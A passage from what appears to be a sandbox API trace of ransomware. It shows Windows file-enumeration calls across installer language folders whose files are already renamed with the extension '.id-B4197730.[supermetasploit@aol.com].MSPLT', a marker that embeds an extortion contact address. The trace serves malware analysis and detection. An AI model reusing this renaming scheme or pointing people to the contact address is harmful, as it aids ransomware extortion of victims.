ftCreationTime.dwLowDateTime=0x59e85ba4, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59e85ba4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e85ba4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x142a6, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.626] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a2b1e4c, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a2b1e4c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a2d7ff4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.626] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a2b1e4c, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a2b1e4c, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a2d7ff4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.626] FindClose (in: hFindFile=0x48a8b0 | out: hFindFile=0x48a8b0) returned 1 [0283.627] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.627] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a6e59a8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a6e59a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1032", cAlternateFileName="")) returned 1 [0283.628] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.628] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1032\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a6e59a8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a6e59a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x48a8b0 [0283.633] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a6e59a8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a6e59a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.633] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a1347e3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a1347e3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a66b8c8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x2394, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.633] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a691966, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a691966, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a6b7b0d, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x15206, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.634] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ab56512, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ab56512, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ad92818, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.634] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ab56512, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ab56512, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ad92818, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4c58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.634] FindClose (in: hFindFile=0x48a8b0 | out: hFindFile=0x48a8b0) returned 1 [0283.635] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.635] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a23f672, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a23f672, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1033", cAlternateFileName="")) returned 1 [0283.635] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.636] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a23f672, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a23f672, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x48a8b0 [0283.639] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a23f672, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a23f672, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.639] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a1ccf1e, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a1ccf1e, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a1f3140, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xd64, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.639] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a1f3140, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a1f3140, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a219534, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x12eb6, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.639] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b0d9ba0, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b0d9ba0, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b126136, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.640] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b0d9ba0, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b0d9ba0, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b126136, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.640] FindClose (in: hFindFile=0x48a8b0 | out: hFindFile=0x48a8b0) returned 1 [0283.641] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.641] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7e9034, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7e9034, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1035", cAlternateFileName="")) returned 1 [0283.641] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.641] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7e9034, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7e9034, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3947ca8 [0283.793] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7e9034, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7e9034, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.793] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a7e9034, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a7e9034, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ab09f52, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xf64, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.794] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a7e9034, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a7e9034, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a835312, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x12dd6, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.794] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b126136, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b126136, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b14c407, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.794] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b126136, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b126136, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b14c407, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.794] FindClose (in: hFindFile=0x3947ca8 | out: hFindFile=0x3947ca8) returned 1 [0283.795] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.795] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7506f5, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7506f5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1036", cAlternateFileName="")) returned 1 [0283.795] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.796] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7506f5, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7506f5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3948228 [0283.799] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a7506f5, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7506f5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.799] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a66b8c8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a66b8c8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a6e59a8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xeb4, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.799] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a6e59a8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a6e59a8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a7506f5, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x14516, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.799] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ad6c5da, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ad6c5da, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5adb8b53, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.799] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ad6c5da, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5ad6c5da, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5adb8b53, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4a58, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.799] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0283.800] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.800] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5ab301eb, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ab301eb, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1037", cAlternateFileName="")) returned 1 [0283.800] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.800] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5ab301eb, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ab301eb, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3947ca8 [0283.805] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5ab301eb, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5ab301eb, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.805] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a709082, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a709082, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a776a46, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1bb4, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.805] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b3fc3a2, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b3fc3a2, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b50939c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x11a86, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.805] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b420fb4, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b420fb4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b52c0bb, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4258, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.805] FindNextFileW (in: hFindFile=0x3947ca8, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b420fb4, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5b420fb4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b52c0bb, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4258, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.805] FindClose (in: hFindFile=0x3947ca8 | out: hFindFile=0x3947ca8) returned 1 [0283.807] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.807] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b02bdea, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b02bdea, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1038", cAlternateFileName="")) returned 1 [0283.807] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.807] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b02bdea, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b02bdea, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x3948168 [0283.809] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5b02bdea, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5b02bdea, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.809] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5ab09f52, 